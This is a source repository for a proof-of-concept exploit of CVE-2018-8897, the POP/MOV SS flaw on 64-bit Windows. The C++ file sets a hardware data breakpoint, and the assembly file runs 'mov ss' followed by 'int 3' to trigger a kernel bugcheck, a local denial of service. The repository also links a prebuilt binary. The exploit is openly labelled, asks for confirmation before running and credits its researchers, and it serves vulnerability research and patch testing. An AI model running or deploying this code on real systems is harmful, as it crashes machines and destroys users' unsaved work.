├── .gitignore
├── Bins
    └── movss.exe
├── movss.cpp
├── movss.sln
├── movss.vcxproj
├── movss.vcxproj.filters
└── vuln.asm


/.gitignore:
--------------------------------------------------------------------------------
  1 | ## Ignore Visual Studio temporary files, build results, and
  2 | ## files generated by popular Visual Studio add-ons.
  3 | ##
  4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
  5 | 
  6 | # User-specific files
  7 | *.suo
  8 | *.user
  9 | *.userosscache
 10 | *.sln.docstates
 11 | 
 12 | # User-specific files (MonoDevelop/Xamarin Studio)
 13 | *.userprefs
 14 | 
 15 | # Build results
 16 | [Dd]ebug/
 17 | [Dd]ebugPublic/
 18 | [Rr]elease/
 19 | [Rr]eleases/
 20 | x64/
 21 | x86/
 22 | bld/
 23 | [Bb]in/
 24 | [Oo]bj/
 25 | [Ll]og/
 26 | 
 27 | # Visual Studio 2015/2017 cache/options directory
 28 | .vs/
 29 | # Uncomment if you have tasks that create the project's static files in wwwroot
 30 | #wwwroot/
 31 | 
 32 | # Visual Studio 2017 auto generated files
 33 | Generated\ Files/
 34 | 
 35 | # MSTest test Results
 36 | [Tt]est[Rr]esult*/
 37 | [Bb]uild[Ll]og.*
 38 | 
 39 | # NUNIT
 40 | *.VisualState.xml
 41 | TestResult.xml
 42 | 
 43 | # Build Results of an ATL Project
 44 | [Dd]ebugPS/
 45 | [Rr]eleasePS/
 46 | dlldata.c
 47 | 
 48 | # Benchmark Results
 49 | BenchmarkDotNet.Artifacts/
 50 | 
 51 | # .NET Core
 52 | project.lock.json
 53 | project.fragment.lock.json
 54 | artifacts/
 55 | **/Properties/launchSettings.json
 56 | 
 57 | # StyleCop
 58 | StyleCopReport.xml
 59 | 
 60 | # Files built by Visual Studio
 61 | *_i.c
 62 | *_p.c
 63 | *_i.h
 64 | *.ilk
 65 | *.meta
 66 | *.obj
 67 | *.iobj
 68 | *.pch
 69 | *.pdb
 70 | *.ipdb
 71 | *.pgc
 72 | *.pgd
 73 | *.rsp
 74 | *.sbr
 75 | *.tlb
 76 | *.tli
 77 | *.tlh
 78 | *.tmp
 79 | *.tmp_proj
 80 | *.log
 81 | *.vspscc
 82 | *.vssscc
 83 | .builds
 84 | *.pidb
 85 | *.svclog
 86 | *.scc
 87 | 
 88 | # Chutzpah Test files
 89 | _Chutzpah*
 90 | 
 91 | # Visual C++ cache files
 92 | ipch/
 93 | *.aps
 94 | *.ncb
 95 | *.opendb
 96 | *.opensdf
 97 | *.sdf
 98 | *.cachefile
 99 | *.VC.db
100 | *.VC.VC.opendb
101 | 
102 | # Visual Studio profiler
103 | *.psess
104 | *.vsp
105 | *.vspx
106 | *.sap
107 | 
108 | # Visual Studio Trace Files
109 | *.e2e
110 | 
111 | # TFS 2012 Local Workspace
112 | $tf/
113 | 
114 | # Guidance Automation Toolkit
115 | *.gpState
116 | 
117 | # ReSharper is a .NET coding add-in
118 | _ReSharper*/
119 | *.[Rr]e[Ss]harper
120 | *.DotSettings.user
121 | 
122 | # JustCode is a .NET coding add-in
123 | .JustCode
124 | 
125 | # TeamCity is a build add-in
126 | _TeamCity*
127 | 
128 | # DotCover is a Code Coverage Tool
129 | *.dotCover
130 | 
131 | # AxoCover is a Code Coverage Tool
132 | .axoCover/*
133 | !.axoCover/settings.json
134 | 
135 | # Visual Studio code coverage results
136 | *.coverage
137 | *.coveragexml
138 | 
139 | # NCrunch
140 | _NCrunch_*
141 | .*crunch*.local.xml
142 | nCrunchTemp_*
143 | 
144 | # MightyMoose
145 | *.mm.*
146 | AutoTest.Net/
147 | 
148 | # Web workbench (sass)
149 | .sass-cache/
150 | 
151 | # Installshield output folder
152 | [Ee]xpress/
153 | 
154 | # DocProject is a documentation generator add-in
155 | DocProject/buildhelp/
156 | DocProject/Help/*.HxT
157 | DocProject/Help/*.HxC
158 | DocProject/Help/*.hhc
159 | DocProject/Help/*.hhk
160 | DocProject/Help/*.hhp
161 | DocProject/Help/Html2
162 | DocProject/Help/html
163 | 
164 | # Click-Once directory
165 | publish/
166 | 
167 | # Publish Web Output
168 | *.[Pp]ublish.xml
169 | *.azurePubxml
170 | # Note: Comment the next line if you want to checkin your web deploy settings,
171 | # but database connection strings (with potential passwords) will be unencrypted
172 | *.pubxml
173 | *.publishproj
174 | 
175 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
176 | # checkin your Azure Web App publish settings, but sensitive information contained
177 | # in these scripts will be unencrypted
178 | PublishScripts/
179 | 
180 | # NuGet Packages
181 | *.nupkg
182 | # The packages folder can be ignored because of Package Restore
183 | **/[Pp]ackages/*
184 | # except build/, which is used as an MSBuild target.
185 | !**/[Pp]ackages/build/
186 | # Uncomment if necessary however generally it will be regenerated when needed
187 | #!**/[Pp]ackages/repositories.config
188 | # NuGet v3's project.json files produces more ignorable files
189 | *.nuget.props
190 | *.nuget.targets
191 | 
192 | # Microsoft Azure Build Output
193 | csx/
194 | *.build.csdef
195 | 
196 | # Microsoft Azure Emulator
197 | ecf/
198 | rcf/
199 | 
200 | # Windows Store app package directories and files
201 | AppPackages/
202 | BundleArtifacts/
203 | Package.StoreAssociation.xml
204 | _pkginfo.txt
205 | *.appx
206 | 
207 | # Visual Studio cache files
208 | # files ending in .cache can be ignored
209 | *.[Cc]ache
210 | # but keep track of directories ending in .cache
211 | !*.[Cc]ache/
212 | 
213 | # Others
214 | ClientBin/
215 | ~$*
216 | *~
217 | *.dbmdl
218 | *.dbproj.schemaview
219 | *.jfm
220 | *.pfx
221 | *.publishsettings
222 | orleans.codegen.cs
223 | 
224 | # Including strong name files can present a security risk 
225 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
226 | #*.snk
227 | 
228 | # Since there are multiple workflows, uncomment next line to ignore bower_components
229 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
230 | #bower_components/
231 | 
232 | # RIA/Silverlight projects
233 | Generated_Code/
234 | 
235 | # Backup & report files from converting an old project file
236 | # to a newer Visual Studio version. Backup files are not needed,
237 | # because we have git ;-)
238 | _UpgradeReport_Files/
239 | Backup*/
240 | UpgradeLog*.XML
241 | UpgradeLog*.htm
242 | ServiceFabricBackup/
243 | *.rptproj.bak
244 | 
245 | # SQL Server files
246 | *.mdf
247 | *.ldf
248 | *.ndf
249 | 
250 | # Business Intelligence projects
251 | *.rdl.data
252 | *.bim.layout
253 | *.bim_*.settings
254 | *.rptproj.rsuser
255 | 
256 | # Microsoft Fakes
257 | FakesAssemblies/
258 | 
259 | # GhostDoc plugin setting file
260 | *.GhostDoc.xml
261 | 
262 | # Node.js Tools for Visual Studio
263 | .ntvs_analysis.dat
264 | node_modules/
265 | 
266 | # Visual Studio 6 build log
267 | *.plg
268 | 
269 | # Visual Studio 6 workspace options file
270 | *.opt
271 | 
272 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
273 | *.vbw
274 | 
275 | # Visual Studio LightSwitch build output
276 | **/*.HTMLClient/GeneratedArtifacts
277 | **/*.DesktopClient/GeneratedArtifacts
278 | **/*.DesktopClient/ModelManifest.xml
279 | **/*.Server/GeneratedArtifacts
280 | **/*.Server/ModelManifest.xml
281 | _Pvt_Extensions
282 | 
283 | # Paket dependency manager
284 | .paket/paket.exe
285 | paket-files/
286 | 
287 | # FAKE - F# Make
288 | .fake/
289 | 
290 | # JetBrains Rider
291 | .idea/
292 | *.sln.iml
293 | 
294 | # CodeRush
295 | .cr/
296 | 
297 | # Python Tools for Visual Studio (PTVS)
298 | __pycache__/
299 | *.pyc
300 | 
301 | # Cake - Uncomment if you are using it
302 | # tools/**
303 | # !tools/packages.config
304 | 
305 | # Tabs Studio
306 | *.tss
307 | 
308 | # Telerik's JustMock configuration file
309 | *.jmconfig
310 | 
311 | # BizTalk build output
312 | *.btp.cs
313 | *.btm.cs
314 | *.odx.cs
315 | *.xsd.cs
316 | 
317 | # OpenCover UI analysis results
318 | OpenCover/
319 | 
320 | # Azure Stream Analytics local run output 
321 | ASALocalRun/
322 | 
323 | # MSBuild Binary and Structured Log
324 | *.binlog
325 | 
326 | # NVidia Nsight GPU debugger configuration file
327 | *.nvuser
328 | 
329 | # MFractors (Xamarin productivity tool) working folder 
330 | .mfractor/


--------------------------------------------------------------------------------
/Bins/movss.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nmulasmajic/CVE-2018-8897/e5d2ab69d73c2bb3f0ea081a31869e72b98b0866/Bins/movss.exe


--------------------------------------------------------------------------------
/movss.cpp:
--------------------------------------------------------------------------------
  1 | /*
  2 | *	Module Name:
  3 | *		movss.cpp
  4 | *
  5 | *	Abstract:
  6 | *		Implements the POP/MOV SS (CVE-2018-8897) vulnerability by bugchecking 
  7 | *		the machine (local DoS). 
  8 | *
  9 | *		For more information, check out our whitepaper:
 10 | *		https://www.triplefault.io/2018/05/spurious-db-exceptions-with-pop-ss.html
 11 | *
 12 | *	Authors:
 13 | *		Nick Peterson <everdox@gmail.com> | http://everdox.net/
 14 | *		Nemanja (Nemi) Mulasmajic <nm@triplefault.io> | http://triplefault.io/
 15 | *
 16 | */
 17 | 
 18 | #if !defined(_WIN32)
 19 | #error "This version of the exploit is only compatible with Windows."
 20 | #endif
 21 | 
 22 | #if !defined(_M_AMD64)
 23 | #error "This exploit must be compiled as 64-bit code."
 24 | #endif
 25 | 
 26 | #pragma warning(push, 0)
 27 | #include <windows.h>
 28 | #pragma warning(pop)
 29 | 
 30 | // The X86 architecture supports only 4 debug registers: DR0, DR1, DR2, and 
 31 | // DR3.
 32 | enum class DEBUG_REGISTERS
 33 | {
 34 | 	DR0 = 0,
 35 | 	DR1 = 1,
 36 | 	DR2 = 2,
 37 | 	DR3 = 3
 38 | };
 39 | 
 40 | // A hardware breakpoint can be from 1 to 4 (8 on X64) bytes in size.
 41 | enum class BREAKPOINT_SIZE
 42 | {
 43 | 	One = 0,
 44 | 	Two = 1,
 45 | 	Eight = 2,
 46 | 	Four = 3
 47 | };
 48 | 
 49 | // A hardware breakpoint can occur on data WRITE, ACCESS (READ/WRITE), or 
 50 | // EXECUTE.
 51 | enum class BREAKPOINT_TYPE
 52 | {
 53 | 	Write = 1,
 54 | 	Access = 3,
 55 | 	Execute = 0
 56 | };
 57 | 
 58 | // The pseudo-handle for the current thread.
 59 | #define NtCurrentThread()		((HANDLE)-2)
 60 | 
 61 | // This is the global memory address we apply the hardware breakpoint on.
 62 | extern "C" WORD StackSelector	= 0;
 63 | 
 64 | // A helper function in assembly that performs the magic.
 65 | extern "C" void __cdecl Execute();
 66 | 
 67 | /*
 68 | *	Sets a data breakpoint (hardware breakpoint) on a user-supplied address.
 69 | */
 70 | extern "C" uintptr_t __stdcall SetDataBreakpoint(
 71 | 	_In_ uintptr_t				Address,
 72 | 	_In_ BREAKPOINT_SIZE		Size,
 73 | 	_In_ DEBUG_REGISTERS		Register = DEBUG_REGISTERS::DR0,
 74 | 	_In_ BREAKPOINT_TYPE		Type = BREAKPOINT_TYPE::Access
 75 | )
 76 | {
 77 | 	// 17.2.4: Debug Control Register (DR7)
 78 | 	static uintptr_t DR7 = 0;
 79 | 
 80 | 	// L0 through L3 (local breakpoint enable) flags (bits 0, 2, 4, and 6)
 81 | 	DR7 |= ((uintptr_t)1 << ((uintptr_t)Register << (uintptr_t)1));
 82 | 
 83 | 	// R/W0 through R/W3 (read/write) fields (bits 16, 17, 20, 21, 24, 25, 28,
 84 | 	// and 29)
 85 | 	DR7 |= ((uintptr_t)Type << (((uintptr_t)Register << 2) + 16));
 86 | 
 87 | 	// LEN0 through LEN3 (Length) fields (bits 18, 19, 22, 23, 26, 27, 30, and
 88 | 	// 31)
 89 | 	DR7 |= ((uintptr_t)Size << (((uintptr_t)Register << 2) + 18));
 90 | 
 91 | 	// The CONTEXT structure needs to be aligned on a 16 byte boundary; this 
 92 | 	// makes sure that is the case.
 93 | 	PCONTEXT Context = (PCONTEXT)_aligned_malloc(sizeof(CONTEXT), 16);
 94 | 	if (!Context)
 95 | 		return 0;
 96 | 
 97 | 	memset(Context, 0, sizeof(CONTEXT));
 98 | 
 99 | 	// Adjust the hardware breakpoints (only).
100 | 	Context->ContextFlags = CONTEXT_DEBUG_REGISTERS;
101 | 
102 | 	// Adjust the DR* contents for this thread.
103 | 	((uintptr_t*)&Context->Dr0)[(uintptr_t)Register] = Address;
104 | 	Context->Dr7 = DR7;
105 | 
106 | 	BOOL bSuccess = SetThreadContext(NtCurrentThread(), Context);
107 | 
108 | 	// Make sure we don't leak any memory.
109 | 	_aligned_free(Context);
110 | 
111 | 	return ((bSuccess) ? Address : 0);
112 | }
113 | 
114 | /*
115 | *	The entry point of the program.
116 | */
117 | int CALLBACK WinMain(
118 | 	_In_ HINSTANCE			hInstance,
119 | 	_In_opt_ HINSTANCE		hPrevInstance,
120 | 	_In_ LPSTR				lpCmdLine,
121 | 	_In_ int				nCmdShow
122 | )
123 | {
124 | 	UNREFERENCED_PARAMETER(hInstance);
125 | 	UNREFERENCED_PARAMETER(hPrevInstance);
126 | 	UNREFERENCED_PARAMETER(lpCmdLine);
127 | 	UNREFERENCED_PARAMETER(nCmdShow);
128 | 
129 | 	// (In)sanity check.
130 | 	if (MessageBoxA(NULL,
131 | 		"WARNING: This will cause your machine to bugcheck.\n"
132 | 		"All unsaved work will be lost.\n\n"
133 | 		"Click 'YES' to continue at your own risk.",
134 | 		"Are you sure you want to continue?",
135 | 		MB_ICONERROR | MB_YESNOCANCEL | MB_DEFBUTTON2)
136 | 		== IDYES)
137 | 	{
138 | 		__try
139 | 		{
140 | 			// Abandon hope all ye who enter here.
141 | 			Execute();
142 | 		}
143 | 		__except (EXCEPTION_EXECUTE_HANDLER)
144 | 		{
145 | 			
146 | 		}
147 | 
148 | 		// If we get this far, that means the vulnerability was not able to 
149 | 		// bugcheck the machine.
150 | 		MessageBoxA(NULL, 
151 | 			"If you're able to get this far, that means your machine "
152 | 			"has not bugchecked. The issue is most likely resolved "
153 | 			"on your OS version.\n", 
154 | 			"Your machine isn't vulnerable.",
155 | 			MB_ICONINFORMATION);
156 | 
157 | 		ExitProcess(1);
158 | 	}
159 | 
160 | 	ExitProcess(0);
161 | }


--------------------------------------------------------------------------------
/movss.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.27703.2000
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "movss", "movss.vcxproj", "{D40E6702-67BD-45B1-8342-D572E742C718}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Release|x64 = Release|x64
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{D40E6702-67BD-45B1-8342-D572E742C718}.Debug|x64.ActiveCfg = Debug|x64
15 | 		{D40E6702-67BD-45B1-8342-D572E742C718}.Debug|x64.Build.0 = Debug|x64
16 | 		{D40E6702-67BD-45B1-8342-D572E742C718}.Release|x64.ActiveCfg = Release|x64
17 | 		{D40E6702-67BD-45B1-8342-D572E742C718}.Release|x64.Build.0 = Release|x64
18 | 	EndGlobalSection
19 | 	GlobalSection(SolutionProperties) = preSolution
20 | 		HideSolutionNode = FALSE
21 | 	EndGlobalSection
22 | 	GlobalSection(ExtensibilityGlobals) = postSolution
23 | 		SolutionGuid = {507414CB-1CC8-4387-9F57-50E17A8C1E6C}
24 | 	EndGlobalSection
25 | EndGlobal
26 | 


--------------------------------------------------------------------------------
/movss.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>15.0</VCProjectVersion>
 23 |     <ProjectGuid>{D40E6702-67BD-45B1-8342-D572E742C718}</ProjectGuid>
 24 |     <RootNamespace>movss</RootNamespace>
 25 |     <WindowsTargetPlatformVersion>10.0.17134.0</WindowsTargetPlatformVersion>
 26 |   </PropertyGroup>
 27 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 28 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 29 |     <ConfigurationType>Application</ConfigurationType>
 30 |     <UseDebugLibraries>true</UseDebugLibraries>
 31 |     <PlatformToolset>v141</PlatformToolset>
 32 |     <CharacterSet>MultiByte</CharacterSet>
 33 |   </PropertyGroup>
 34 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 35 |     <ConfigurationType>Application</ConfigurationType>
 36 |     <UseDebugLibraries>false</UseDebugLibraries>
 37 |     <PlatformToolset>v141</PlatformToolset>
 38 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 39 |     <CharacterSet>MultiByte</CharacterSet>
 40 |   </PropertyGroup>
 41 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 42 |     <ConfigurationType>Application</ConfigurationType>
 43 |     <UseDebugLibraries>true</UseDebugLibraries>
 44 |     <PlatformToolset>v141</PlatformToolset>
 45 |     <CharacterSet>MultiByte</CharacterSet>
 46 |   </PropertyGroup>
 47 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 48 |     <ConfigurationType>Application</ConfigurationType>
 49 |     <UseDebugLibraries>false</UseDebugLibraries>
 50 |     <PlatformToolset>v141</PlatformToolset>
 51 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 52 |     <CharacterSet>MultiByte</CharacterSet>
 53 |   </PropertyGroup>
 54 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 55 |   <ImportGroup Label="ExtensionSettings">
 56 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <CodeAnalysisRuleSet>NativeRecommendedRules.ruleset</CodeAnalysisRuleSet>
 75 |     <RunCodeAnalysis>true</RunCodeAnalysis>
 76 |   </PropertyGroup>
 77 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 78 |     <CodeAnalysisRuleSet>NativeRecommendedRules.ruleset</CodeAnalysisRuleSet>
 79 |     <RunCodeAnalysis>true</RunCodeAnalysis>
 80 |   </PropertyGroup>
 81 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 82 |     <CodeAnalysisRuleSet>NativeRecommendedRules.ruleset</CodeAnalysisRuleSet>
 83 |     <RunCodeAnalysis>true</RunCodeAnalysis>
 84 |   </PropertyGroup>
 85 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 86 |     <CodeAnalysisRuleSet>NativeRecommendedRules.ruleset</CodeAnalysisRuleSet>
 87 |     <RunCodeAnalysis>true</RunCodeAnalysis>
 88 |   </PropertyGroup>
 89 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 90 |     <ClCompile>
 91 |       <WarningLevel>EnableAllWarnings</WarningLevel>
 92 |       <Optimization>Disabled</Optimization>
 93 |       <SDLCheck>true</SDLCheck>
 94 |       <ConformanceMode>true</ConformanceMode>
 95 |       <BasicRuntimeChecks />
 96 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
 97 |       <EnablePREfast>true</EnablePREfast>
 98 |     </ClCompile>
 99 |     <Link>
100 |       <EntryPointSymbol>
101 |       </EntryPointSymbol>
102 |       <SubSystem>Windows</SubSystem>
103 |       <GenerateDebugInformation>DebugFull</GenerateDebugInformation>
104 |     </Link>
105 |   </ItemDefinitionGroup>
106 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
107 |     <ClCompile>
108 |       <WarningLevel>EnableAllWarnings</WarningLevel>
109 |       <Optimization>Disabled</Optimization>
110 |       <SDLCheck>true</SDLCheck>
111 |       <ConformanceMode>true</ConformanceMode>
112 |       <BasicRuntimeChecks />
113 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
114 |       <EnablePREfast>true</EnablePREfast>
115 |     </ClCompile>
116 |     <Link>
117 |       <EntryPointSymbol>
118 |       </EntryPointSymbol>
119 |       <SubSystem>Windows</SubSystem>
120 |       <GenerateDebugInformation>DebugFull</GenerateDebugInformation>
121 |     </Link>
122 |   </ItemDefinitionGroup>
123 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
124 |     <ClCompile>
125 |       <WarningLevel>EnableAllWarnings</WarningLevel>
126 |       <Optimization>MaxSpeed</Optimization>
127 |       <FunctionLevelLinking>true</FunctionLevelLinking>
128 |       <IntrinsicFunctions>true</IntrinsicFunctions>
129 |       <SDLCheck>true</SDLCheck>
130 |       <ConformanceMode>true</ConformanceMode>
131 |       <BasicRuntimeChecks />
132 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
133 |       <EnablePREfast>true</EnablePREfast>
134 |     </ClCompile>
135 |     <Link>
136 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
137 |       <OptimizeReferences>true</OptimizeReferences>
138 |       <EntryPointSymbol>
139 |       </EntryPointSymbol>
140 |       <SubSystem>Windows</SubSystem>
141 |     </Link>
142 |   </ItemDefinitionGroup>
143 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
144 |     <ClCompile>
145 |       <WarningLevel>EnableAllWarnings</WarningLevel>
146 |       <Optimization>MaxSpeed</Optimization>
147 |       <FunctionLevelLinking>true</FunctionLevelLinking>
148 |       <IntrinsicFunctions>true</IntrinsicFunctions>
149 |       <SDLCheck>true</SDLCheck>
150 |       <ConformanceMode>true</ConformanceMode>
151 |       <BasicRuntimeChecks />
152 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
153 |       <EnablePREfast>true</EnablePREfast>
154 |     </ClCompile>
155 |     <Link>
156 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
157 |       <OptimizeReferences>true</OptimizeReferences>
158 |       <EntryPointSymbol>
159 |       </EntryPointSymbol>
160 |       <SubSystem>Windows</SubSystem>
161 |     </Link>
162 |   </ItemDefinitionGroup>
163 |   <ItemGroup>
164 |     <ClCompile Include="movss.cpp" />
165 |   </ItemGroup>
166 |   <ItemGroup>
167 |     <MASM Include="vuln.asm">
168 |       <FileType>Document</FileType>
169 |     </MASM>
170 |   </ItemGroup>
171 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
172 |   <ImportGroup Label="ExtensionTargets">
173 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
174 |   </ImportGroup>
175 | </Project>


--------------------------------------------------------------------------------
/movss.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="movss.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 |   <ItemGroup>
23 |     <MASM Include="vuln.asm">
24 |       <Filter>Source Files</Filter>
25 |     </MASM>
26 |   </ItemGroup>
27 | </Project>


--------------------------------------------------------------------------------
/vuln.asm:
--------------------------------------------------------------------------------
 1 | ; This is the global memory address we apply the hardware breakpoint on.
 2 | EXTERN StackSelector: word
 3 | 
 4 | ; A reference to the C++ routine that will set a hardware breakpoint
 5 | ; on a target memory address.
 6 | EXTERN SetDataBreakpoint: proc
 7 | 
 8 | .code
 9 | 
10 | Execute PROC
11 | 	; Store the current (valid) SS selector.
12 | 	mov [StackSelector], ss
13 | 
14 | 	; BREAKPOINT_TYPE::Access
15 | 	mov r9, 3
16 | 
17 | 	; DEBUG_REGISTERS::DR0
18 | 	mov r8, 0
19 | 
20 | 	; BREAKPOINT_SIZE::Four
21 | 	mov rdx, 3
22 | 	
23 | 	; Address to place a DB (HWBP) on. This is the address of the global 
24 | 	; that contains the SS selector value.
25 | 	lea rcx, StackSelector
26 | 
27 | 	; Setup shadow space on the stack.
28 | 	sub rsp, 20h
29 | 
30 | 	; Prime the current thread's debug registers.
31 | 	call SetDataBreakpoint
32 | 
33 | 	; Restore home space.
34 | 	add rsp, 20h
35 | 
36 | 	; Check to see if the routine failed.
37 | 	test rax, rax
38 | 	jz exit
39 | 	
40 | 	mov ss, [rax] ; #DB should fire here, but it's supressed.
41 | 	int 3
42 | 
43 | 	; #DB is released after the INT 03 instruction executes. 
44 | 	;
45 | 	; INT 03 will branch to kernelmode, in particular, to the IDT
46 | 	; entry at nt!KiBreakpointTrap.
47 | 	;
48 | 	; nt!KiBreakpointTrap will not execute its first instruction, 
49 | 	; since it will be interrupted by the #DB that was just
50 | 	; dispatched. This will cause the processor to transition to 
51 | 	; the #DB handler at nt!KiDebugTrapOrFault.
52 | 
53 | exit:
54 | 	; This instruction shouldn't execute if we succeed.
55 | 	ret
56 | Execute ENDP
57 | 
58 | END


--------------------------------------------------------------------------------